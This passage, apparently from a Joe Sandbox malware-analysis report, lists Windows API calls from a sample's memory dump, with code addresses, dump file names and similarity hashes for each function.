                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                    • API String ID: 3964851224-769500911
                                                                    • Opcode ID: 82c369661b978d5912cfb843f79d7fb1d2136a7b9a0f982145f2a879360ea82b
                                                                    • Instruction ID: 77893af6ad9103f6c716f5dea66f0f46e196ebbdf6ca7fada2068410e89d036d
                                                                    • Opcode Fuzzy Hash: 82c369661b978d5912cfb843f79d7fb1d2136a7b9a0f982145f2a879360ea82b
                                                                    • Instruction Fuzzy Hash: C511C4309002098FCF04FFA8DC618FEB3B4FF59304B548495D89467792EB365906DB50
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0104EC07
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0104EC37
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0104ED6A
                                                                    • CloseHandle.KERNEL32(?), ref: 0104EDEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: 1fdf9c198d368ae23ec55eb020f97bc67d5cb3589c823ce8ecd468e3d3fe8f1d
                                                                    • Instruction ID: 9f848717c961e3f893639ff3eca7b5f0793c3e83f10fcf11f2d29b13a19ec40a
                                                                    • Opcode Fuzzy Hash: 1fdf9c198d368ae23ec55eb020f97bc67d5cb3589c823ce8ecd468e3d3fe8f1d
                                                                    • Instruction Fuzzy Hash: 658160B16043019FD760EF28CC86F2AB7E6AF44710F44881EF995DB3D2D6B9AC418B91
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010500FD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0105013C
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01050183
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 010501AF
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 010501BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3440857362-0
                                                                    • Opcode ID: aed50647d7b62bde7a692dcdf87f227bcb95f1877f42eeb53c9a82b45ba1e66c
                                                                    • Instruction ID: 3f780180c723a9d9ba9ce850ab3635ae1abc64dd71568dcddf438a288c1785f6
                                                                    • Opcode Fuzzy Hash: aed50647d7b62bde7a692dcdf87f227bcb95f1877f42eeb53c9a82b45ba1e66c
                                                                    • Instruction Fuzzy Hash: 4B516631208205AFD754EF68CC81EAFB7E9AF84304F44481EF9858B291EB35E904DB52
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104D927
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0104D9AA
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0104D9C6
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0104DA07
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0104DA21
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
                                                                    • Instruction ID: 7a044ab9e2d1a87a748163808699719138162965cb427d46a383bbff7135dba3
                                                                    • Opcode Fuzzy Hash: d540b1ae43455bd2589052d8b8cc33d177ab42273d2fb9149c67427329f52fbc
                                                                    • Instruction Fuzzy Hash: 6A513D75A04205DFCB00EFA8C4949ADB7F6FF19310B0880AAE895AB312D739ED45CF91
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0103E61F
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0103E648
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0103E687
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0103E6AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0103E6B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 99a61582e3e1cdf277c60d90f6d620443b3d8bad3b4aefaed780c9a97c628462
                                                                    • Instruction ID: bd7c5a92e9c2accc682e343f9be95b839a4ff9d811a4cfc04b2e3d729cf180c3
                                                                    • Opcode Fuzzy Hash: 99a61582e3e1cdf277c60d90f6d620443b3d8bad3b4aefaed780c9a97c628462
                                                                    • Instruction Fuzzy Hash: 98513C35A00205DFCB01EFA4C9819AEBBF5EF49350F188099E949AB362CB75ED11EF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3eded7f61fb17eb214451d143f44bb0b47e0125d2f200dd60732baf26b4ea184
                                                                    • Instruction ID: 4cec05af12c93e30e2fdac58380f0c5511a9679b291c2ca56bd76bd8082688eb
                                                                    • Opcode Fuzzy Hash: 3eded7f61fb17eb214451d143f44bb0b47e0125d2f200dd60732baf26b4ea184
                                                                    • Instruction Fuzzy Hash: 73419335A04204EFD7A1DA68CC58FABBFE8FB09390F040295FE95A72D1CB349941DB64
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00FD2357
                                                                    • ScreenToClient.USER32(010957B0,?), ref: 00FD2374
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00FD2399
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00FD23A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 848fe4a80551ddb1f3ff1ec9334ac71076633536522b53d4dde38e52b185bcb6
                                                                    • Instruction ID: 9d6f58db873de636c2a82c7386100586170c0d2066e80b135e5f4454ddc1081e
                                                                    • Opcode Fuzzy Hash: 848fe4a80551ddb1f3ff1ec9334ac71076633536522b53d4dde38e52b185bcb6
                                                                    • Instruction Fuzzy Hash: 4A41B235A04106FBEF669F68C844AEEBBB5FB15320F24435AF868922D0C7359950EF91
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 010263E7
                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 01026433
                                                                    • TranslateMessage.USER32(?), ref: 0102645C
                                                                    • DispatchMessageW.USER32(?), ref: 01026466
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01026475
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                    • String ID:
                                                                    • API String ID: 2108273632-0
                                                                    • Opcode ID: 0ab8d20ec3fd4643373f8b0c990a8414c61111ef596fc83e292b2c70be2bac34
                                                                    • Instruction ID: 471e39d6da7e2f512dde4abb614042e653b167763438b1a80f13bf06ce088954
                                                                    • Opcode Fuzzy Hash: 0ab8d20ec3fd4643373f8b0c990a8414c61111ef596fc83e292b2c70be2bac34
                                                                    • Instruction Fuzzy Hash: 4931C6319002669FDB75CE75DC54BB7BBEDBB05300F1441A6E9E1C3195EB2B9045C760
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 01028A30
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 01028ADA
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 01028AE2
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 01028AF0
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 01028AF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
                                                                    • Instruction ID: 86f156e708676acdaa850d54ebc8feb0ca677ab068f57daa7f7b8c759d1c373e
                                                                    • Opcode Fuzzy Hash: 245452b1ab352e931935665be3260e86f3c5ae0b53badf691d18d4c3c2571153
                                                                    • Instruction Fuzzy Hash: AB31C07150022AEBEF14CFA8D94CA9E3BF5FB05315F10825AF965E71C1C7B49914CB90
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0102B204
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0102B221
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0102B259
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0102B27F
                                                                    • _wcsstr.LIBCMT ref: 0102B289
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: 659581ba730f6151e7ae179bb9f520d8effc9d9c5ff287afd1fd7d1540b5a2d7
                                                                    • Instruction ID: 776d766a9b23a97c41d76a662578b1e10789853f8d1565ab3ee21ed81c258a29
                                                                    • Opcode Fuzzy Hash: 659581ba730f6151e7ae179bb9f520d8effc9d9c5ff287afd1fd7d1540b5a2d7
                                                                    • Instruction Fuzzy Hash: DB2104326043157BEB259B799C09E7F7BDCDF4A760F004169F944DA1A2EE69D84093A0
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0105B192
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0105B1B7
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0105B1CF
                                                                    • GetSystemMetrics.USER32(00000004), ref: 0105B1F8
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01040E90,00000000), ref: 0105B216
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 2294984445-0
                                                                    • Opcode ID: 0b49c6aaa3afcbd3eae640b52c1ed93d28686a81f0e6c55e3696e398eb11f557
                                                                    • Instruction ID: ab2754dd36c495bfa51fb63f361a5cfd71b11ffb996def20c9c967bf45d056d9
                                                                    • Opcode Fuzzy Hash: 0b49c6aaa3afcbd3eae640b52c1ed93d28686a81f0e6c55e3696e398eb11f557
                                                                    • Instruction Fuzzy Hash: 9A21B171914216AFCBA09E39DC08A6F3BA5FB05361F104729FEB2D71D0D735A810CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01029320
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01029352
                                                                    • __itow.LIBCMT ref: 0102936A
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01029392
                                                                    • __itow.LIBCMT ref: 010293A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow$_memmove
                                                                    • String ID:
                                                                    • API String ID: 2983881199-0
                                                                    • Opcode ID: c24c93f5afe031157cd6e6154a6555f4298d04f8568a1046c0740baa418294dd
                                                                    • Instruction ID: 5081546d02a3726ab24e7e295500ab67b05bc5b103a0d551157dc95a944d2b9f
                                                                    • Opcode Fuzzy Hash: c24c93f5afe031157cd6e6154a6555f4298d04f8568a1046c0740baa418294dd
                                                                    • Instruction Fuzzy Hash: CC212C317003297BDB10AA648C85EEF7BEDEF88714F049026FE84DB2C1D674C94197A1
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 01045A6E
                                                                    • GetForegroundWindow.USER32 ref: 01045A85
                                                                    • GetDC.USER32(00000000), ref: 01045AC1
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 01045ACD
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 01045B08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ForegroundPixelRelease
                                                                    • String ID:
                                                                    • API String ID: 4156661090-0
                                                                    • Opcode ID: 140fe34af1b2f833e9b5954d360e63b986cc3bb82da05ec527c9f38c3f16faf3
                                                                    • Instruction ID: fd8b1eb5a336c056e7e950d60d6aea715d71f1e30890c521fe6602008e8c0d81
                                                                    • Opcode Fuzzy Hash: 140fe34af1b2f833e9b5954d360e63b986cc3bb82da05ec527c9f38c3f16faf3
                                                                    • Instruction Fuzzy Hash: 4C218475A00205AFD714EFA5DC88AAABBE9EF48310F048479F889D7351CB79ED00DB90
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FD134D
                                                                    • SelectObject.GDI32(?,00000000), ref: 00FD135C
                                                                    • BeginPath.GDI32(?), ref: 00FD1373
                                                                    • SelectObject.GDI32(?,00000000), ref: 00FD139C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 5b639d2f45b67f78b34ab7aa3dc4000ee7cd6a0d56f4539aa973362e7d0f2095
                                                                    • Instruction ID: 5163852bfb88c51d48714171d10ff0fa8fa24721cb01e0257d65f8b6dbe46f77
                                                                    • Opcode Fuzzy Hash: 5b639d2f45b67f78b34ab7aa3dc4000ee7cd6a0d56f4539aa973362e7d0f2095
                                                                    • Instruction Fuzzy Hash: F4217431801309EFDB229F16DC0476B7BE9FB04321F284217F490AA294D77A9891EF90
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01034ABA
                                                                    • __beginthreadex.LIBCMT ref: 01034AD8
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 01034AED
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01034B03
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01034B0A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 3824534824-0
                                                                    • Opcode ID: 5e7902ce62e5a93c1f281ef799286009fdfc4b0c2843adcde42ef9ca7f796b9f
                                                                    • Instruction ID: f6f47a06013d93026f2dfa4b3a005726ae4033506910c7609e638e169e2ea751
                                                                    • Opcode Fuzzy Hash: 5e7902ce62e5a93c1f281ef799286009fdfc4b0c2843adcde42ef9ca7f796b9f
                                                                    • Instruction Fuzzy Hash: 92116B72904308BFD7219FBDDC08A9F7FACEB86320F04429AF994D7240D67A890087A0
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0102821E
                                                                    • GetLastError.KERNEL32(?,01027CE2,?,?,?), ref: 01028228
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,01027CE2,?,?,?), ref: 01028237
                                                                    • HeapAlloc.KERNEL32(00000000,?,01027CE2,?,?,?), ref: 0102823E
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01028255
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: 93cadc16216151516f3780b61926a5d8b90573ec759c075b9cbc083cffd55d75
